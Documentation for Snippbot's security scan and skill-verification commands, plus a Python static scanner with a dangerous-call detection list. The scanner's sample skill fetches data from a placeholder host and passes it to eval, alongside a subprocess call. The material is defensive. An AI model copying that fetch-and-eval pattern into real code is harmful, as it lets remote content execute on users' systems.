# security / skills

Two related command groups:

- `snippbot security` — run scans of your Snippbot installation, review findings, and browse scan history.
- `snippbot skills` — verify the signature of and statically analyze individual skill files before loading them.
## Overview

```bash
# security group
snippbot security scan            # Run a full scan
snippbot security scan --quick    # Critical checks only
snippbot security report          # Show the latest scan
snippbot security findings        # List findings (filterable)
snippbot security history         # List recent scans

# skills group
snippbot skills verify <path>     # Verify signature + static scan
snippbot skills scan <path>       # Static analysis only
```

## snippbot security scan
Runs security checks (credential exposure, file permissions, database integrity, etc.) and produces a health score out of 100.

```bash
snippbot security scan                # Full scan
snippbot security scan --quick        # Critical checks only
snippbot security scan --json-output  # Machine-readable
```

| Option | Description |
|---|---|
| `--quick` | Critical checks only — finishes in < 1s |
| `--json-output` | Emit structured JSON |

Sample output:

```
┌─ Security Scan Results ─┐
│ Health Score: 85/100    │
└─────────────────────────┘

 ✓ Credential Exposure
 ✓ File Permissions
 ⚠ Database Integrity (2 findings)

Run `snippbot security findings` to see details.
```

## snippbot security report
Show the latest scan report, or a specific one by ID.

```bash
snippbot security report
snippbot security report --scan-id abc123
snippbot security report --json-output
```

## snippbot security findings
List individual findings across all scans. Filter by severity, category, or limit.

```bash
snippbot security findings                  # Latest 50
snippbot security findings -s critical      # Critical only
snippbot security findings -c credential_exposure
snippbot security findings -n 100
```

| Option | Values | Description |
|---|---|---|
| `-s, --severity` | `critical`, `high`, `medium`, `low` | Filter by severity |
| `-c, --category` | (string) | Filter by check category |
| `-n, --limit` | int (default 50) | Max findings to display |

## snippbot security history
Browse recent scans.

```bash
snippbot security history        # Last 10
snippbot security history -n 25
```

## snippbot skills verify
Verify a skill file's signature and run static analysis. Use before loading untrusted skills.

```bash
snippbot skills verify ./my_skill.py
snippbot skills verify ./my_skill.py --public-key <hex>
```

If a `my_skill.manifest.json` sidecar exists, it is loaded automatically. Supply `--public-key` (hex-encoded Ed25519) to check a detached signature.
## snippbot skills scan

Static analysis only — no signature check. Useful for triage before a skill has been signed.

```bash
snippbot skills scan ./my_skill.py
snippbot skills scan ./my_skill.py --json-output
```

Flags dangerous patterns (e.g. `eval`, subprocess execution, network calls) with severities aligned to `snippbot security findings`.
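As an added illustration of the kind of check `snippbot skills scan` performs on a Python skill file (this is not Snippbot's own scanner; the pattern table, severities, and the sample skill are assumptions modelled on the patterns named above), the scanner below walks the AST and resolves import aliases so that `import subprocess as sp` does not hide a flagged call:

```python
import ast
# Assumed severity table for callee names; Snippbot's real check list is not on the page.
DANGEROUS_CALLS = {
    "eval": "critical", "exec": "critical",
    "subprocess.run": "high", "subprocess.Popen": "high", "os.system": "high",
    "socket.socket": "medium", "urllib.request.urlopen": "medium",
    "requests.get": "medium", "requests.post": "medium",
}

def _import_aliases(tree: ast.AST) -> dict:
    """Map local names to imported paths, so `import subprocess as sp` cannot hide a call."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            prefix = f"{node.module}." if getattr(node, "module", None) else ""
            for a in node.names:
                aliases[a.asname or a.name] = prefix + a.name
    return aliases

def _callee_name(node: ast.Call, aliases: dict) -> "str | None":
    """Dotted callee name with aliases resolved; None if not statically resolvable."""
    parts, func = [], node.func
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if not isinstance(func, ast.Name):
        return None
    parts.append(aliases.get(func.id, func.id))
    return ".".join(reversed(parts))

def scan_skill_source(source: str) -> list:
    """Report each dangerous call as {line, pattern, severity}, ordered by line."""
    tree = ast.parse(source)
    aliases = _import_aliases(tree)
    findings = [
        {"line": n.lineno, "pattern": name, "severity": DANGEROUS_CALLS[name]}
        for n in ast.walk(tree) if isinstance(n, ast.Call)
        if (name := _callee_name(n, aliases)) in DANGEROUS_CALLS
    ]
    return sorted(findings, key=lambda f: f["line"])
# Constructed sample skill file (not a real Snippbot skill) using an import alias.
SAMPLE_SKILL = """\
import subprocess as sp
from urllib.request import urlopen
def run(snippet):
    cfg = urlopen("https://example.invalid/cfg").read()
    sp.run(["git", "status"])
    return eval(cfg)
"""
```

Calling `scan_skill_source(SAMPLE_SKILL)` reports the network call on line 4 as medium, the subprocess execution on line 5 as high, and the `eval` on line 6 as critical; a call whose target cannot be resolved statically (for example a method on a returned object) is skipped rather than guessed.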